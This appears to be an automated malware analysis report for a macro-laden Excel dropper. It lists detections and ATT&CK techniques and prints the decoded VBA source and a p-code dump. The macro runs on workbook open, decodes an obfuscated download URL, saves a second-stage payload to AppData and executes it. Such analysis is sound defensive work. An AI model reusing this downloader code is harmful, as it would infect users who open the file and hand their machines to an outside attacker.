MALICIOUS
276
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an Excel file containing a Workbook_Open VBA macro that utilizes the URLDownloadToFile API to download a second-stage payload. The macro attempts to save the payload to the AppData directory. The presence of the Workbook_Open macro and the use of URLDownloadToFile are strong indicators of a downloader or dropper functionality.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-7783762-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7783762-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _ ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk") acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10212 bytes |
SHA-256: 1208bb92161f3d36c2bdc2f31280b7cd5b5e637472b7227dd4e076725e1b839a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Bil()
End Sub
Attribute VB_Name = "YufjTbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function EPSiDEOXSw Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal EqRoAOwNzDe As Long, ByVal RPJcYvRqvsDGVrsBLGkzSm As String, _
ByVal FApUefdiSLTxKJ As String, ByVal ZegXxMEpWYtVbpzThUHi As String, ByVal EDgMe As String, ByVal QUuUgZspLiGyuGWmHvEcW As Long) As Long
Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _
ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long
Sub DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX()
Dim EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As String
Dim VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As String
Dim acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH As String
Dim RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs As String
Dim WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae As String
Dim QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG As String
VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk")
acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb
EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV = Decrypt("fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui")
BmtAQrrGwzrPtXVDsM 0, EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV, acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, 0, 0
EPSiDEOXSw 0, "open", acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, "", vbNullString, vbNormalFocus
End Sub
Sub Workbook_Open()
DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX
End Sub
Public Function mutiqueshed(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1ababb648e22b16fdc57d3 As Double
be3a8c1f30f1ababb648e22b16fdc57d3 = 242.162
Dim columnwall As Byte
columnwall = 114.429
Dim t0ea0a0840384a15e019665b2e996b72f As Long
t0ea0a0840384a15e019665b2e996b72f = 184.954
Dim n2b549c2e42dc58d564726b5780212aba As Double
n2b549c2e42dc58d564726b5780212aba = 185.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fcabf21f As String
m974e3e334b64ac13b6dec997fcabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd15305c As Boolean
z2c55929d38494d4bf3ab6ba3dd15305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fbc0 As Double
b9d76f7072ca3da29e82e55579143fbc0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function
Private Function Decrypt(enc)
Dim x, v, AppData
enc = StrReverse(enc)
For v = 1 To Len(enc)
x = Mid(enc, v, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
Decrypt = AppData
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore__t236yey
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub RPJcYvRqvsDGVrsBLGkzSm())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/YufjTbook - 6404 bytes
' Line #0:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function ZegXxMEpWYtVbpzThUHi Lib "OZfcnEFbclJqTjPVpxnSNOMR" (ByVal EDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal shell32.dll As String, ByVal BmtAQrrGwzrPtXVDsM As String, ByVal DuHRBAooPXkMgLjBNBz As String, ByVal tLIf As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function CvChH Lib "acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH" (ByVal tJNPHhJoYTIdTKXjRQ As Long, ByVal urlmon As String, ByVal DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX As String, ByVal EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As Long, ByVal VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Sub RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs())
' Line #5:
' Dim
' VarDefn WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae (As String)
' Line #6:
' Dim
' VarDefn QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG (As String)
' Line #7:
' Dim
' VarDefn Decrypt (As String)
' Line #8:
' Dim
' VarDefn Environ (As String)
' Line #9:
' Dim
' VarDefn vbNullString (As String)
' Line #10:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #11:
' LitStr 0x0008 "fyf/sskk"
' ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001
' St QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG
' Line #12:
' LitStr 0x0007 "AppData"
' ArgsLd mutiqueshed$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG
' Concat
' St Decrypt
' Line #13:
' Line #14:
' Line #15:
' LitStr 0x0038 "fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui"
' ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001
' St WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae
' Line #16:
' Line #17:
' LitDI2 0x0000
' Ld WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall CvChH 0x0005
' Line #18:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld burgerorgan
' Ld bonusshoot
' ArgsCall ZegXxMEpWYtVbpzThUHi 0x0006
' Line #19:
' EndSub
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' FuncDefn (Sub id_0296())
' Line #25:
' Line #26:
' ArgsCall RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs 0x0000
' Line #27:
' EndSub
' Line #28:
' Line #29:
' Line #30:
' FuncDefn (Public Function be3a8c1f30f1ababb648e22b16fdc57d3(columnwall, t0ea0a0840384a15e019665b2e996b72f, id_FFFE As Variant))
' Line #31:
' LitStr 0x0001 "*"
' Ld columnwall
' Concat
' LitStr 0x0001 "*"
' Concat
' St n2b549c2e42dc58d564726b5780212aba
' Line #32:
' Dim
' VarDefn dhmpmrvyvrxwv (As Double)
' Line #33:
' LitR8 0xBE77 0x1A9F 0x452F 0x406E
' St dhmpmrvyvrxwv
' Line #34:
' Dim
' VarDefn m974e3e334b64ac13b6dec997fcabf21f (As Byte)
' Line #35:
' LitR8 0x7EFA 0xBC6A 0x9B74 0x405C
' St m974e3e334b64ac13b6dec997fcabf21f
' Line #36:
' Dim
' VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #37:
' LitR8 0x0C4A 0x2B02 0x1E87 0x4067
' St b08576ffe41cb67690655f1261f410844
' Line #38:
' Dim
' VarDefn z2c55929d38494d4bf3ab6ba3dd15305c (As Double)
' Line #39:
' LitR8 0xE148 0x147A 0x23AE 0x4067
' St z2c55929d38494d4bf3ab6ba3dd15305c
' Line #40:
' LitStr 0x0000 ""
' St b9d76f7072ca3da29e82e55579143fbc0
' Line #41:
' Dim
' VarDefn kqeepfyakmzwuediw (As String)
' Line #42:
' LitStr 0x000B "naiveremove"
' St kqeepfyakmzwuediw
' Line #43:
' Dim
' VarDefn flamesight (As Byte)
' Line #44:
' LitR8 0x3127 0xAC08 0x3A1C 0x4033
' St flamesight
' Line #45:
' Dim
' VarDefn sweartrust (As Boolean)
' Line #46:
' LitR8 0xE560 0x22D0 0x79DB 0x4057
' St sweartrust
' Line #47:
' Dim
' VarDefn prqhhqrabc (As Double)
' Line #48:
' LitR8 0x7CEE 0x353F 0x2A5E 0x405B
' St prqhhqrabc
' Line #49:
' Ld t0ea0a0840384a15e019665b2e996b72f
' Ld n2b549c2e42dc58d564726b5780212aba
' Like
' Not
' IfBlock
' Line #50:
' Ld columnwall
' St b9d76f7072ca3da29e82e55579143fbc0
' Line #51:
' Dim
' VarDefn enc (As Double)
' Line #52:
' LitR8 0x2B02 0x1687 0xBED9 0x404E
' St enc
' Line #53:
' Ld enc
' LitR8 0xD2F2 0x624D 0xA810 0x4067
' Ne
' IfBlock
' Line #54:
' Dim
' VarDefn x (As Byte)
' Line #55:
' LitR8 0xDD2F 0x0624 0x9981 0x406A
' St x
' Line #56:
' Dim
' VarDefn v (As Long)
' Line #57:
' LitR8 0xAC08 0x5A1C 0x7F64 0x406D
' St v
' Line #58:
' Dim
' VarDefn AppData (As String)
' Line #59:
' LitStr 0x000C "fadzjgdilazu"
' St AppData
' Line #60:
' EndIfBlock
' Line #61:
' EndFunc
' Line #62:
' Line #63:
' FuncDefn (Private Function UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open(StrReverse, id_FFFE As Variant))
' Line #64:
' Dim
' VarDefn Chr
' VarDefn Asc
' VarDefn Sheet1
' Line #65:
' Ld StrReverse
' ArgsLd Sheet2 0x0001
' St StrReverse
' Line #66:
' StartForVariable
' Ld Asc
' EndForVariable
' LitDI2 0x0001
' Ld StrReverse
' FnLen
' For
' Line #67:
' Ld StrReverse
' Ld Asc
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Chr
' Line #68:
' Ld Sheet1
' Ld Chr
' ArgsLd Workbook 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd Sheet3 0x0001
' Concat
' St Sheet1
' Line #69:
' StartForVariable
' Next
' Line #70:
' Ld Sheet1
' St UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open
' Line #71:
' EndFunc
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.